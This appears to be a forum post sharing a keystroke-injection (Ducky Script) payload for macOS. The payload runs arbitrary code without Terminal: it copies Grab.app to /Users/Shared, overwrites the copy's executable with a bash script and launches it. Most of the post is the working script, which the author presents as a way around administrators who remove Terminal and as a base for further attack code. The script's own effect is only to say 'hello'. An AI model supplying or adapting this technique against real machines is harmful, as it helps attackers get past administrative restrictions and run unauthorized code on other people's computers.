Jump to content

Mac Payload Without Using Terminal.app


Recommended Posts

Here is my new payload to attack a Mac without using terminal.

I got this idea after seeing how using good management software, an administrator can remove an app from a Mac (one such application being terminal). This eliminated a lot of the attacks I have previously made to work against a Mac. So I got to thinking and poking around inside of applications, and it turns out you can replace the contents of certain files in a Mac application and you can run scripts. You simply open the right file and replace it with your code, and then run the application. The app no longer functions normally, but by making a duplicate app in another folder and editing that one you can run your attack code without completely losing the original files and all without terminal. I used Grab.app for this but almost any app could be used, I wanted to find one that was not likely to have anything similarly named around it because of the way I selected the application to copy it.

 

Here is the code, its outcome is to simply "say hello" (so if you test it have the volume up a bit). I have not really played with the delays yet, they are all over the place and some are to high but it makes it a bit easier to see what is going on. This is not a final project but rather a starting point to spark some new ideas. Have Fun, but please use this responsibly.

DELAY 2000
COMMAND SPACE
DELAY 300
STRING /Applications/Utilities/
DELAY 200
ENTER
DELAY 400
STRING g
DELAY 500
COMMAND c
DELAY 300
COMMAND SPACE
DELAY 300
STRING /Users/Shared/
DELAY 400
ENTER
DELAY 400
COMMAND v
DELAY 2000
COMMAND SPACE
DELAY 300
STRING /Users/Shared/Grab.app/Contents/MacOS/
DELAY 600
ENTER
DELAY 500
TAB
DELAY 500
COMMAND o
DELAY 500
COMMAND a
DELAY 500
STRING #!/bin/bash
DELAY 400
ENTER
DELAY 300
STRING say
DELAY 300
ESCAPE
DELAY 300
SPACE
DELAY 300
STRING hello
DELAY 300
COMMAND s
DELAY 400
COMMAND q
DELAY 500
COMMAND SPACE
DELAY 300
STRING /Users/Shared/Grab.app
DELAY 400
ENTER
COMMAND w
COMMAND w
COMMAND w

 

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...